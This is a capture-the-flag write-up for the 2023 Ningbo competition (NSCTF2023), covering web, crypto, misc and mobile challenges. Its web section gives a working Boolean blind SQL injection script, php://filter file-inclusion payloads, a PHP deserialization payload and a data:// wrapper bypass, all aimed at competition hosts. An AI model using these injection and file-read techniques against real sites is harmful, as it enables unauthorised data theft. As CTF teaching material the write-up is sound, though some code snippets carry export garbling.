The 6th Ningbo City Competition [NSCTF2023] part of web+ part of misc+ part of password+mobile

Foreword

Only the web, misc is written by me, the rest is written by the team’s master, I am Feiwu, that’s it

Web

Query

View the source code with hint login.php, and then display the login interface

image-20230520153206872

Use the universal password to log in, there is an echo
image-20230520153637646

The echo is Successful login Use the script to perform Boolean blind injection

import requests
import string

url="http://d574c221d2a0f4da.node.nsctf.cn/login.php"
s=string.ascii_letters + string.digits
flag=''
for i in range(1,999):
    print(i)
    for j in range(32,128):

        # library name
        #s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),{i} ,1))/**/like/**/{j},1,0)#"

        # Table Name
        #s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where /**/table_schema/**/like/**/'ctf'),{i},1))/**/like/**/{j},1,0)#"

        # column names
        #s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(column_name)frOm/**/information_schema.columns/**/where/**/ table_name/**/like/**/'f111'),{i},1))/**/like/**/{j},1,0)#"

        s = f"-1'/**/or/**/if(ord(substr((select/**/group_concat(flagdata)/**/from/**/ctf.f111),{<!- - -->i},1))/**/like/**/{<!-- -->j},1,0)#"

        data={<!-- -->
            'username': s,
            'password': 1
        }

        r=requests. post(url, data=data)
        if "login successful" in r.text:
            flag + =chr(j)
            print(flag)
            break

Run the script to get the flag

image-20230520154409436

Deserialization

Press f12 to get hint

//The location of the flag is at route.php
$read = $_POST["read"];
$input = $_POST["input"];
if(!isset($read) or !isset($input))
{<!-- -->
    die("NONONO!");
}
if(strpos($read, "f14g")===FALSE)
{<!-- -->
    include($read);
    $input = unserialize($input);
    $input2 = clone $input;
    $input2->position = "route.php";
}
else{<!-- -->
    die("NONONO!");
}

Construct payload to read source code of route.php file

read=php://filter/read=convert.base64-encode/resource=route.php &input=1

The base decrypts to get the code:

<h1>Here can you find the position of the flag!</h1>

<?php

$position = "f14g.php";
$gadget = "h1nt.php";

?>

View h1nt.php in the same way:

read=php://filter/read=convert.base64-encode/resource=h1nt.php &input=1

Decrypted:

<?php
class test
{<!-- -->
    public $position;
    public function __clone(){<!-- -->
        echo file_get_contents($this->position);
        return $this->position;
    }
}
?>

Then deserialize, so that the value of position is set to read the payload of f14g.php

class test
{<!-- -->
    public $position;
    public function __construct($position){<!-- -->
        $this->position = $position;
    }

    public function __clone(){<!-- -->
        echo file_get_contents($this->position);
        return $this->position;
    }
}

$input = new test("php://filter/read=convert.base64-encode/resource=f14g.php");
print(serialize($input).PHP_EOL);

incoming parameters

read=h1nt.php &input=O:4:"test":1:{s:8:"position";s:57:"php://filter/read=convert.base64-encode /resource=f14g.php";}

Base64 decryption to get flag

CodeCheck

f12 gets hint

$flag = "************";
if(!isset($_GET['a']) or !isset($_GET['b']))
{<!-- -->
    die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")
{<!-- -->
    die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c'])
{<!-- -->
    die("NONONO");
}
if(isset($_GET['d']))
{<!-- -->
    include($_GET['d']);
}

It means that the content of the file we want to pass into a is flag

And it is necessary to make the file content of b the same as the parameters passed in by c

Then pass in d and use the include() function to read the file

get parameter

http://96d9f0fc6195d0b3.node.nsctf.cn/?a=data://text/plain,flag & amp;b=data://text/plain,flag & amp;c=flag & amp; d=php://filter/read=convert.base64-encode/resource=index.php

Base64 decryption to get flag

image-20230520132525105

Crypto

secret

e, phi is not mutually prime, the script is directly shuttled

p=134261118796789547851478407090640074022214132682000430136383795981942884853000826171189906102866323044078348933419038 543719361923320694974970600426450755845839235949167391987970330836004768360774676424958554946699767582105556239177450470656 065560178592346659948800891455240736405480828554486592172443394370831
q=14784744453415212899754693160229226609474088934715419242055490465181334091574432810410006537329434672396435673643670993 487174116132828694415024273344554222829303640465755616884472352181583668938718485687109102543489671060568859484740005168636 1372872763001355411405782508020591933546964183881743133374126947753
n=198501633144015525026544777517958899623243600649245949482311680927419516752629335736910709938637632909629451903724002625 265952244374639692383329275640852372717192986268779177925956037444338814099630462920952056868790150295866593848667195149481 816824277445553133828388057407236640508469500019163326313976062777038884929276358678705387095969939874392252478161379751566 571195093720230835077727303324827752584446114627710958963806449970113412650217191890982620727563420691892621881274280790174 18048118345180074280858160934483114966968365184788420091050933273417544493001214931876588653781824475472028383256488638441 92743
c=139133963667550106070434775525772682779282413191012153816623314980460806259028312024866460207675689218811851248949602428 672541629276054162284601083990874069892580370176396191955067110900128774541313835688327506061029011107820455292679405044713 228473648080947906626967854705948922447161372037818902842168740354863025060422634532555804753807429592013140037885536929779 143579969821183285871191241441812907533893941492353810453896968414714839473106633299938730461231345871496613479997749581050 911038063757023870841493095423515410211401110484082481214084016019791085107588915955500546997198017086462324271989022719536 73874
e=28
n = p * q
phi = (p - 1) * (q - 1)
t = gmpy2.gcd(e,phi)
t1 = e // t
dt1 = gmpy2.invert(t1,phi)
mt1 = pow(c,dt1,n)
s,m = gmpy2.iroot(mt1,t)
print(long_to_bytes(s))

Morse’s Notebook

secret.txt is a sentence, take out the punctuation marks separately

. ,,. ! . ,! . . . ! . . . ! . ,,! ,,,! . ,. ! ,. . ! . . ! . . . ! ,. ,. ! ,,,! ,. ! ,,. ! . ,. ! . ,! ,! . . .

Guess it is Morse code, use online website to decrypt

PASSWORDISCONGRATS, the guess is the Virginia password, decrypt the password given in the attachment, the key is tested to be congrats

image-20230520132827166

ciphey solves the flag

image-20230520133030020

RSA

The online website directly decomposes n-1 to get g

2 * 1346104232461691 *135708505946334625064263690521822985541406355995436858353723774763830387086504214757233911421189560 013585202467696506993984900376187580052410626083870574392838722601495658545778273522672899637362825029231312511794005808914 91236925451166755184695335564693793568286112036468975877609637392241679

Use the script to decrypt:

from Crypto.Util.number import inverse, long_to_bytes

g = 1346104232461691
n = 36535558847082719901201561031181835346574576610950713924924272947759193576365817762980927638691696601293089537315055413 746788190208875234794229119049056299551864869870291634941246362436491006904347559559494705922259007299126640817275929491680 601926404543198957206717290905220235571289759182878331893962038379
c = 53299787294045228218904343000800279369478843982246530253220875423100579905797237830857610908246399655199253317454638697 9606697890310597738637156771564229
a = 26948584063125634344745539889044035975514843733583390925289130284541001118813681264939906571175716725103314111867456395 63619323775673115439

e = 65537
d = inverse(e, (a - 1) * (g - 1))
plaintext = pow(c, d, a * g)
decrypted_message = long_to_bytes(plaintext)

print("Decrypted message:", decrypted_message. decode())

get the flag

Decrypted message: flag{p01la4d_rHo_a1gOr1thM_r1gh4}

Misc

ZIP

The attachment is a compressed package, a password is required to decrypt it, but there is a hint

The art of 0 and 1, and it will remain shorter than 9.

Note that the password is only 0 and 1, and no more than 9 digits

Generating dictionaries with dictionary generators

image-20230520133312598

Then perform dictionary blasting and decryption on the compressed package

image-20230520133403373

Blow out the password and get the flag

Simple Document

010 Open the file and find the header of the PDF file

image-20230520142246089

Separate files manually and save as PDF files

image-20230520142546751

There is nothing in the pdf, so

Convert it to a word file, change the color and font, and get the flag

image-20230520142613318

Mobile

peacock

1. The main logic is in the test, and it is found that the test library is loaded inside the test

1684561616670

1684561621104

2. Find the libtest.so file in lib and open it with ida

1684561705741

Found base64 encrypted ciphertext and table in the string window

1684561748390